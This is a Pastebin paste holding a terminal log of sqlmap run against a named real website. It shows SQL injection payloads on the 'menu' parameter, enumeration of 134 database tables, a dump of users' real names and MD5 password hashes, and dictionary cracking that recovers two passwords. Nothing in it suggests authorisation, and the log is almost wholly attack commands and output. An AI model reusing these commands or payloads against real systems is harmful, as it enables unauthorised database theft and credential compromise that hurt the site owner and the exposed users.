API tools faq
paste
View difference between Paste ID: tnS7BPNh and Ep8AGd0Q
SHOW: | | - or go back to the newest paste.
1
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent --dbs
2
3
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet --tables

4
5
    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool

6
    http://sqlmap.org

7
8
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

9
10
[*] starting at 22:14:54

11
12
[22:14:54] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Opera/9.52 (X11; Linux x86_64; U; en)

13
[22:14:55] [INFO] resuming back-end DBMS 'mysql' 

14
[22:15:03] [INFO] testing connection to the target url

15
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

16
---

17
Place: GET

18
Parameter: menu

19
    Type: boolean-based blind

20
    Title: AND boolean-based blind - WHERE or HAVING clause

21
    Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk

22
23
    Type: error-based

24
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

25
    Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG

26
27
    Type: AND/OR time-based blind

28
    Title: MySQL > 5.0.11 AND time-based blind

29
    Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs

30
---

31
32
[22:15:10] [INFO] the back-end DBMS is MySQL

33
34
web application technology: PHP 5.2.6, Apache

35
back-end DBMS: MySQL 5.0

36
[22:15:10] [INFO] fetching tables for database: 'gymsticknet'

37
[22:15:23] [INFO] heuristics detected web page charset 'ascii'

38
[22:15:23] [INFO] the SQL query used returns 134 entries

39
[22:15:24] [INFO] retrieved: afb_accounts

40
[22:15:24] [INFO] retrieved: afb_accounts_has_perms

41
[22:15:25] [INFO] retrieved: afb_blacklist_dirs

42
[22:15:25] [INFO] retrieved: afb_blacklist_ext

43
[22:15:26] [INFO] retrieved: afb_blacklist_files

44
[22:15:26] [INFO] retrieved: afb_log

45
[22:15:27] [INFO] retrieved: afb_settings

46
[22:15:28] [INFO] retrieved: afb_shares

47
[22:15:28] [INFO] retrieved: bh2_aclgroups

48
[22:15:30] [INFO] retrieved: bh2_aclpublic

49
[22:15:31] [INFO] retrieved: bh2_aclusers

50
[22:15:31] [INFO] retrieved: bh2_adminmodulesmenu

51
[22:15:32] [INFO] retrieved: bh2_bandwidth

52
[22:15:32] [INFO] retrieved: bh2_config

53
[22:15:34] [INFO] retrieved: bh2_filecodereminders

54
[22:15:34] [INFO] retrieved: bh2_filecodes

55
[22:15:35] [INFO] retrieved: bh2_groupusers

56
[22:15:36] [INFO] retrieved: bh2_log

57
[22:15:36] [INFO] retrieved: bh2_logactions

58
[22:15:37] [INFO] retrieved: bh2_metadata

59
[22:15:39] [INFO] retrieved: bh2_modules

60
[22:15:39] [INFO] retrieved: bh2_modulesaccesslevel

61
[22:15:40] [INFO] retrieved: bh2_modulesdirectory

62
[22:15:40] [INFO] retrieved: bh2_modulesfiletype

63
[22:15:41] [INFO] retrieved: bh2_modulesmenu

64
[22:15:42] [INFO] retrieved: bh2_modulesusertype

65
[22:15:43] [INFO] retrieved: bh2_packages

66
[22:15:43] [INFO] retrieved: bh2_passwordresets

67
[22:15:45] [INFO] retrieved: bh2_registrations

68
[22:15:46] [INFO] retrieved: bh2_satellitetransfers

69
[22:15:46] [INFO] retrieved: bh2_texts

70
[22:15:47] [INFO] retrieved: bh2_uploads

71
[22:15:48] [INFO] retrieved: bh2_userinfo

72
[22:15:50] [INFO] retrieved: bh2_users

73
[22:15:51] [INFO] retrieved: bh2_usersviews

74
[22:15:53] [INFO] retrieved: contacts

75
[22:15:55] [INFO] retrieved: countries

76
[22:15:57] [INFO] retrieved: downloads_agreements

77
[22:15:59] [INFO] retrieved: downloads_categories

78
[22:16:00] [INFO] retrieved: downloads_comments

79
[22:16:02] [INFO] retrieved: downloads_config

80
[22:16:04] [INFO] retrieved: downloads_customfields

81
[22:16:06] [INFO] retrieved: downloads_customfields_data

82
[22:16:07] [INFO] retrieved: downloads_files

83
[22:16:09] [INFO] retrieved: downloads_ip_restrict

84
[22:16:10] [INFO] retrieved: downloads_ip_restrict_log

85
[22:16:10] [INFO] retrieved: downloads_languages

86
[22:16:11] [INFO] retrieved: downloads_leech_settings

87
[22:16:12] [INFO] retrieved: downloads_mirrors

88
[22:16:12] [INFO] retrieved: downloads_permissions

89
[22:16:13] [INFO] retrieved: downloads_recommend_blocklist

90
[22:16:13] [INFO] retrieved: downloads_recommend_log

91
[22:16:14] [INFO] retrieved: downloads_stats

92
[22:16:14] [INFO] retrieved: downloads_usergroups

93
[22:16:15] [INFO] retrieved: downloads_userpermissions

94
[22:16:16] [INFO] retrieved: downloads_users

95
[22:16:16] [INFO] retrieved: files

96
[22:16:17] [INFO] retrieved: folders

97
[22:16:17] [INFO] retrieved: intrausers

98
[22:16:18] [INFO] retrieved: ipfm_groups

99
[22:16:19] [INFO] retrieved: ipfm_reg_antispam

100
[22:16:19] [INFO] retrieved: ipfm_validating

101
[22:16:20] [INFO] retrieved: menu

102
[22:16:21] [INFO] retrieved: pages

103
[22:16:21] [INFO] retrieved: pfn_accesos

104
[22:16:22] [INFO] retrieved: pfn_arquivos

105
[22:16:22] [INFO] retrieved: pfn_arquivos_campos_palabras

106
[22:16:23] [INFO] retrieved: pfn_bloqueo_ip

107
[22:16:23] [INFO] retrieved: pfn_campos

108
[22:16:24] [INFO] retrieved: pfn_configuracions

109
[22:16:25] [INFO] retrieved: pfn_configuracions_datos

110
[22:16:25] [INFO] retrieved: pfn_directorios

111
[22:16:26] [INFO] retrieved: pfn_grupos

112
[22:16:26] [INFO] retrieved: pfn_palabras

113
[22:16:27] [INFO] retrieved: pfn_raices

114
[22:16:27] [INFO] retrieved: pfn_raices_grupos_configuracions

115
[22:16:28] [INFO] retrieved: pfn_raices_usuarios

116
[22:16:29] [INFO] retrieved: pfn_sesions

117
[22:16:29] [INFO] retrieved: pfn_usuarios

118
[22:16:30] [INFO] retrieved: phpwebgallery_caddie

119
[22:16:31] [INFO] retrieved: phpwebgallery_categories

120
[22:16:31] [INFO] retrieved: phpwebgallery_comments

121
[22:16:32] [INFO] retrieved: phpwebgallery_config

122
[22:16:32] [INFO] retrieved: phpwebgallery_download_multi

123
[22:16:33] [INFO] retrieved: phpwebgallery_favorites

124
[22:16:34] [INFO] retrieved: phpwebgallery_group_access

125
[22:16:36] [INFO] retrieved: phpwebgallery_groups

126
[22:16:36] [INFO] retrieved: phpwebgallery_history

127
[22:16:37] [INFO] retrieved: phpwebgallery_history_summary

128
[22:16:38] [INFO] retrieved: phpwebgallery_image_category

129
[22:16:38] [INFO] retrieved: phpwebgallery_image_tag

130
[22:16:39] [INFO] retrieved: phpwebgallery_images

131
[22:16:39] [INFO] retrieved: phpwebgallery_old_permalinks

132
[22:16:40] [INFO] retrieved: phpwebgallery_plugins

133
[22:16:41] [INFO] retrieved: phpwebgallery_rate

134
[22:16:41] [INFO] retrieved: phpwebgallery_search

135
[22:16:42] [INFO] retrieved: phpwebgallery_sessions

136
[22:16:42] [INFO] retrieved: phpwebgallery_sites

137
[22:16:43] [INFO] retrieved: phpwebgallery_tags

138
[22:16:43] [INFO] retrieved: phpwebgallery_upgrade

139
[22:16:44] [INFO] retrieved: phpwebgallery_user_access

140
[22:16:45] [INFO] retrieved: phpwebgallery_user_cache

141
[22:16:45] [INFO] retrieved: phpwebgallery_user_cache_categories

142
[22:16:46] [INFO] retrieved: phpwebgallery_user_feed

143
[22:16:47] [INFO] retrieved: phpwebgallery_user_group

144
[22:16:47] [INFO] retrieved: phpwebgallery_user_infos

145
[22:16:48] [INFO] retrieved: phpwebgallery_user_mail_notification

146
[22:16:48] [INFO] retrieved: phpwebgallery_users

147
[22:16:49] [INFO] retrieved: phpwebgallery_waiting

148
[22:16:53] [INFO] retrieved: phpwebgallery_ws_access

149
[22:16:54] [INFO] retrieved: relay_clients

150
[22:16:54] [INFO] retrieved: relay_filesystem

151
[22:16:55] [INFO] retrieved: relay_log

152
[22:16:56] [INFO] retrieved: relay_permissions

153
[22:16:57] [INFO] retrieved: relay_users

154
[22:16:58] [INFO] retrieved: spages

155
[22:16:58] [INFO] retrieved: submenu

156
[22:16:59] [INFO] retrieved: tc_acp_label_states

157
[22:17:00] [INFO] retrieved: tc_admin_cp_false_logins

158
[22:17:01] [INFO] retrieved: tc_banned_ips

159
[22:17:01] [INFO] retrieved: tc_error_log

160
[22:17:02] [INFO] retrieved: tc_forum_integration

161
[22:17:03] [INFO] retrieved: tc_installed_plugins

162
[22:17:03] [INFO] retrieved: tc_membergroups

163
[22:17:04] [INFO] retrieved: tc_members

164
[22:17:05] [INFO] retrieved: tc_menu

165
[22:17:05] [INFO] retrieved: tc_pages

166
[22:17:06] [INFO] retrieved: tc_plugin_lists

167
[22:17:06] [INFO] retrieved: tc_plugins

168
[22:17:07] [INFO] retrieved: tc_sessions

169
[22:17:07] [INFO] retrieved: tc_settings

170
[22:17:08] [INFO] retrieved: tc_statistics_visitors

171
[22:17:09] [INFO] retrieved: test

172
[22:17:09] [INFO] retrieved: users

173
Database: gymsticknet

174
[134 tables]

175
+--------------------------------------+

176
| afb_accounts                         |

177
| afb_accounts_has_perms               |

178
| afb_blacklist_dirs                   |

179
| afb_blacklist_ext                    |

180
| afb_blacklist_files                  |

181
| afb_log                              |

182
| afb_settings                         |

183
| afb_shares                           |

184
| bh2_aclgroups                        |

185
| bh2_aclpublic                        |

186
| bh2_aclusers                         |

187
| bh2_adminmodulesmenu                 |

188
| bh2_bandwidth                        |

189
| bh2_config                           |

190
| bh2_filecodereminders                |

191
| bh2_filecodes                        |

192
| bh2_groupusers                       |

193
| bh2_log                              |

194
| bh2_logactions                       |

195
| bh2_metadata                         |

196
| bh2_modules                          |

197
| bh2_modulesaccesslevel               |

198
| bh2_modulesdirectory                 |

199
| bh2_modulesfiletype                  |

200
| bh2_modulesmenu                      |

201
| bh2_modulesusertype                  |

202
| bh2_packages                         |

203
| bh2_passwordresets                   |

204
| bh2_registrations                    |

205
| bh2_satellitetransfers               |

206
| bh2_texts                            |

207
| bh2_uploads                          |

208
| bh2_userinfo                         |

209
| bh2_users                            |

210
| bh2_usersviews                       |

211
| contacts                             |

212
| countries                            |

213
| downloads_agreements                 |

214
| downloads_categories                 |

215
| downloads_comments                   |

216
| downloads_config                     |

217
| downloads_customfields               |

218
| downloads_customfields_data          |

219
| downloads_files                      |

220
| downloads_ip_restrict                |

221
| downloads_ip_restrict_log            |

222
| downloads_languages                  |

223
| downloads_leech_settings             |

224
| downloads_mirrors                    |

225
| downloads_permissions                |

226
| downloads_recommend_blocklist        |

227
| downloads_recommend_log              |

228
| downloads_stats                      |

229
| downloads_usergroups                 |

230
| downloads_userpermissions            |

231
| downloads_users                      |

232
| files                                |

233
| folders                              |

234
| intrausers                           |

235
| ipfm_groups                          |

236
| ipfm_reg_antispam                    |

237
| ipfm_validating                      |

238
| menu                                 |

239
| pages                                |

240
| pfn_accesos                          |

241
| pfn_arquivos                         |

242
| pfn_arquivos_campos_palabras         |

243
| pfn_bloqueo_ip                       |

244
| pfn_campos                           |

245
| pfn_configuracions                   |

246
| pfn_configuracions_datos             |

247
| pfn_directorios                      |

248
| pfn_grupos                           |

249
| pfn_palabras                         |

250
| pfn_raices                           |

251
| pfn_raices_grupos_configuracions     |

252
| pfn_raices_usuarios                  |

253
| pfn_sesions                          |

254
| pfn_usuarios                         |

255
| phpwebgallery_caddie                 |

256
| phpwebgallery_categories             |

257
| phpwebgallery_comments               |

258
| phpwebgallery_config                 |

259
| phpwebgallery_download_multi         |

260
| phpwebgallery_favorites              |

261
| phpwebgallery_group_access           |

262
| phpwebgallery_groups                 |

263
| phpwebgallery_history                |

264
| phpwebgallery_history_summary        |

265
| phpwebgallery_image_category         |

266
| phpwebgallery_image_tag              |

267
| phpwebgallery_images                 |

268
| phpwebgallery_old_permalinks         |

269
| phpwebgallery_plugins                |

270
| phpwebgallery_rate                   |

271
| phpwebgallery_search                 |

272
| phpwebgallery_sessions               |

273
| phpwebgallery_sites                  |

274
| phpwebgallery_tags                   |

275
| phpwebgallery_upgrade                |

276
| phpwebgallery_user_access            |

277
| phpwebgallery_user_cache             |

278
| phpwebgallery_user_cache_categories  |

279
| phpwebgallery_user_feed              |

280
| phpwebgallery_user_group             |

281
| phpwebgallery_user_infos             |

282
| phpwebgallery_user_mail_notification |

283
| phpwebgallery_users                  |

284
| phpwebgallery_waiting                |

285
| phpwebgallery_ws_access              |

286
| relay_clients                        |

287
| relay_filesystem                     |

288
| relay_log                            |

289
| relay_permissions                    |

290
| relay_users                          |

291
| spages                               |

292
| submenu                              |

293
| tc_acp_label_states                  |

294
| tc_admin_cp_false_logins             |

295
| tc_banned_ips                        |

296
| tc_error_log                         |

297
| tc_forum_integration                 |

298
| tc_installed_plugins                 |

299
| tc_membergroups                      |

300
| tc_members                           |

301
| tc_menu                              |

302
| tc_pages                             |

303
| tc_plugin_lists                      |

304
| tc_plugins                           |

305
| tc_sessions                          |

306
| tc_settings                          |

307
| tc_statistics_visitors               |

308
| test                                 |

309
| users                                |

310
+--------------------------------------+

311
312
[22:17:10] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'

313
314
[*] shutting down at 22:17:10

315
316
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet -T users --columns

317
318
    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool

319
    http://sqlmap.org

320
321
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

322
323
[*] starting at 22:21:35

324
325
[22:21:35] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows NT 5.1; U; ; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.52

326
[22:21:36] [INFO] resuming back-end DBMS 'mysql' 

327
[22:21:37] [INFO] testing connection to the target url

328
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

329
---

330
Place: GET

331
Parameter: menu

332
    Type: boolean-based blind

333
    Title: AND boolean-based blind - WHERE or HAVING clause

334
    Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk

335
336
    Type: error-based

337
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

338
    Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG

339
340
    Type: AND/OR time-based blind

341
    Title: MySQL > 5.0.11 AND time-based blind

342
    Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs

343
---

344
345
[22:21:38] [INFO] the back-end DBMS is MySQL

346
347
web application technology: PHP 5.2.6, Apache

348
back-end DBMS: MySQL 5.0

349
[22:21:38] [INFO] fetching columns for table 'users' in database 'gymsticknet'

350
[22:21:39] [INFO] heuristics detected web page charset 'ascii'

351
[22:21:39] [INFO] the SQL query used returns 5 entries

352
[22:21:40] [INFO] retrieved: id

353
[22:21:40] [INFO] retrieved: int(11)

354
[22:21:41] [INFO] retrieved: name

355
[22:21:42] [INFO] retrieved: varchar(255)

356
[22:21:42] [INFO] retrieved: username

357
[22:21:43] [INFO] retrieved: varchar(255)

358
[22:21:43] [INFO] retrieved: password

359
[22:21:44] [INFO] retrieved: varchar(255)

360
[22:21:44] [INFO] retrieved: super

361
[22:21:45] [INFO] retrieved: tinyint(1)

362
Database: gymsticknet

363
Table: users

364
[5 columns]

365
+----------+--------------+

366
| Column   | Type         |

367
+----------+--------------+

368
| id       | int(11)      |

369
| name     | varchar(255) |

370
| password | varchar(255) |

371
| super    | tinyint(1)   |

372
| username | varchar(255) |

373
+----------+--------------+

374
375
[22:21:45] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'

376
377
[*] shutting down at 22:21:45

378
379
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet -T users -C name --dump

380
381
    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool

382
    http://sqlmap.org

383
384
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

385
386
[*] starting at 22:24:37

387
388
[22:24:37] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19

389
[22:24:38] [INFO] resuming back-end DBMS 'mysql' 

390
[22:24:40] [INFO] testing connection to the target url

391
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

392
---

393
Place: GET

394
Parameter: menu

395
    Type: boolean-based blind

396
    Title: AND boolean-based blind - WHERE or HAVING clause

397
    Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk

398
399
    Type: error-based

400
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

401
    Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG

402
403
    Type: AND/OR time-based blind

404
    Title: MySQL > 5.0.11 AND time-based blind

405
    Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs

406
---

407
408
[22:24:43] [INFO] the back-end DBMS is MySQL

409
410
web application technology: PHP 5.2.6, Apache

411
back-end DBMS: MySQL 5.0

412
do you want sqlmap to consider provided column(s):

413
[1] as LIKE column names (default)

414
[2] as exact column names

415
> 2

416
417
[22:24:47] [INFO] fetching columns 'name' for table 'users' in database 'gymsticknet'

418
[22:24:47] [INFO] heuristics detected web page charset 'ascii'

419
[22:24:48] [INFO] the SQL query used returns 1 entries

420
[22:24:48] [INFO] retrieved: name

421
[22:24:49] [INFO] retrieved: varchar(255)

422
[22:24:49] [INFO] fetching entries of column(s) 'name' for table 'users' in database 'gymsticknet'

423
[22:24:49] [INFO] the SQL query used returns 4 entries

424
[22:24:50] [INFO] retrieved: antti mikkola

425
[22:24:51] [INFO] retrieved: juha hoo

426
[22:24:51] [INFO] retrieved: keijo pesonen

427
[22:24:52] [INFO] retrieved: testikayttaja

428
[22:24:52] [INFO] analyzing table dump for possible password hashes

429
Database: gymsticknet

430
Table: users

431
[4 entries]

432
+---------------+

433
| name          |

434
+---------------+

435
| antti mikkola |

436
| juha hoo      |

437
| keijo pesonen |

438
| testikayttaja |

439
+---------------+

440
441
[22:24:52] [INFO] table 'gymsticknet.users' dumped to CSV file '/pentest/database/sqlmap/output/www.gymstick.net/dump/gymsticknet/users.csv'

442
[22:24:52] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'

443
444
[*] shutting down at 22:24:52

445
446
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet -T users -C password --dump

447
448
    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool

449
    http://sqlmap.org

450
451
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

452
453
[*] starting at 22:25:42

454
455
[22:25:42] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5

456
[22:25:42] [INFO] resuming back-end DBMS 'mysql' 

457
[22:25:43] [INFO] testing connection to the target url

458
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

459
---

460
Place: GET

461
Parameter: menu

462
    Type: boolean-based blind

463
    Title: AND boolean-based blind - WHERE or HAVING clause

464
    Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk

465
466
    Type: error-based

467
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

468
    Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG

469
470
    Type: AND/OR time-based blind

471
    Title: MySQL > 5.0.11 AND time-based blind

472
    Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs

473
---

474
475
[22:25:45] [INFO] the back-end DBMS is MySQL

476
477
web application technology: PHP 5.2.6, Apache

478
back-end DBMS: MySQL 5.0

479
do you want sqlmap to consider provided column(s):

480
[1] as LIKE column names (default)

481
[2] as exact column names

482
> 2

483
484
[22:25:49] [INFO] fetching columns 'password' for table 'users' in database 'gymsticknet'

485
[22:25:50] [INFO] heuristics detected web page charset 'ascii'

486
[22:25:50] [INFO] the SQL query used returns 1 entries

487
[22:25:51] [INFO] retrieved: password

488
[22:25:51] [INFO] retrieved: varchar(255)

489
[22:25:52] [INFO] fetching entries of column(s) 'password' for table 'users' in database 'gymsticknet'

490
[22:25:52] [INFO] the SQL query used returns 4 entries

491
[22:25:52] [INFO] retrieved: 8d68c0d987f302d0fe6de347245b5587

492
[22:25:53] [INFO] retrieved: 9627df7a4a5b849f67fce863e82adc71

493
[22:25:53] [INFO] retrieved: db2fa9922825f59757dd5fcb5d8e1f2b

494
[22:25:54] [INFO] retrieved: db2fa9922825f59757dd5fcb5d8e1f2b

495
[22:25:54] [INFO] analyzing table dump for possible password hashes

496
recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] y

497
498
[22:26:03] [INFO] using hash method 'md5_generic_passwd'

499
what dictionary do you want to use?

500
[1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)

501
[2] custom dictionary file

502
[3] file with list of dictionary files

503
> 1

504
505
[22:26:23] [INFO] using default dictionary

506
[22:26:23] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'

507
do you want to use common password suffixes? (slow!) [y/N] y

508
509
[22:26:32] [INFO] starting dictionary-based cracking (md5_generic_passwd)

510
[22:26:32] [INFO] starting 2 processes 

511
[22:27:08] [INFO] cracked password 'testi' for hash '9627df7a4a5b849f67fce863e82adc71'                                                        

512
[22:27:11] [INFO] using suffix '1'                                                                                                            

513
[22:27:40] [INFO] cracked password 'molo1' for hash 'db2fa9922825f59757dd5fcb5d8e1f2b'                                                        

514
[22:27:54] [INFO] using suffix '123'                                                                                                          

515
[22:28:35] [INFO] using suffix '2'                                                                                                            

516
[22:29:17] [INFO] using suffix '12'                                                                                                           

517
[22:29:55] [INFO] using suffix '3'                                                                                                            

518
[22:30:34] [INFO] using suffix '13'                                                                                                           

519
[22:31:12] [INFO] using suffix '7'                                                                                                            

520
[22:31:57] [INFO] using suffix '11'                                                                                                           

521
[22:32:34] [INFO] using suffix '5'                                                                                                            

522
[22:33:23] [INFO] using suffix '22'                                                                                                           

523
[22:34:00] [INFO] using suffix '23'                                                                                                           

524
[22:34:41] [INFO] using suffix '01'                                                                                                           

525
[22:35:36] [INFO] using suffix '4'                                                                                                            

526
[22:36:28] [INFO] using suffix '07'                                                                                                           

527
[22:37:06] [INFO] using suffix '21'                                                                                                           

528
[22:37:44] [INFO] using suffix '14'                                                                                                           

529
[22:38:27] [INFO] using suffix '10'                                                                                                           

530
[22:39:07] [INFO] using suffix '06'                                                                                                           

531
[22:39:42] [INFO] using suffix '08'                                                                                                           

532
[22:40:20] [INFO] using suffix '8'                                                                                                            

533
[22:40:58] [INFO] using suffix '15'                                                                                                           

534
[22:41:38] [INFO] using suffix '69'                                                                                                           

535
[22:42:17] [INFO] using suffix '16'                                                                                                           

536
[22:42:52] [INFO] using suffix '6'                                                                                                            

537
[22:43:27] [INFO] using suffix '18'                                                                                                           

538
[22:44:06] [INFO] using suffix '!'                                                                                                            

539
[22:44:44] [INFO] using suffix '.'                                                                                                            

540
[22:45:21] [INFO] using suffix '*'                                                                                                            

541
[22:45:58] [INFO] using suffix '!!'                                                                                                           

542
[22:46:32] [INFO] using suffix '?'                                                                                                            

543
[22:47:13] [INFO] using suffix ';'                                                                                                            

544
[22:47:49] [INFO] using suffix '..'                                                                                                           

545
[22:48:32] [INFO] using suffix '!!!'                                                                                                          

546
[22:49:17] [INFO] using suffix ','                                                                                                            

547
[22:49:54] [INFO] using suffix '@'                                                                                                            

548
[22:50:33] [INFO] writing uncracked hashes to file '/tmp/tmpzshPZE.txt' for eventual further processing                                       

549
[22:50:33] [INFO] postprocessing table dump

550
Database: gymsticknet

551
Table: users

552
[4 entries]

553
+------------------------------------------+

554
| password                                 |

555
+------------------------------------------+

556
| 8d68c0d987f302d0fe6de347245b5587         |

557
| 9627df7a4a5b849f67fce863e82adc71 (testi) |

558
| db2fa9922825f59757dd5fcb5d8e1f2b (molo1) |

559
| db2fa9922825f59757dd5fcb5d8e1f2b (molo1) |

560
+------------------------------------------+

561
562
[22:50:33] [INFO] table 'gymsticknet.users' dumped to CSV file '/pentest/database/sqlmap/output/www.gymstick.net/dump/gymsticknet/users.csv'

563
[22:50:33] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'

564
565
[*] shutting down at 22:50:33
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!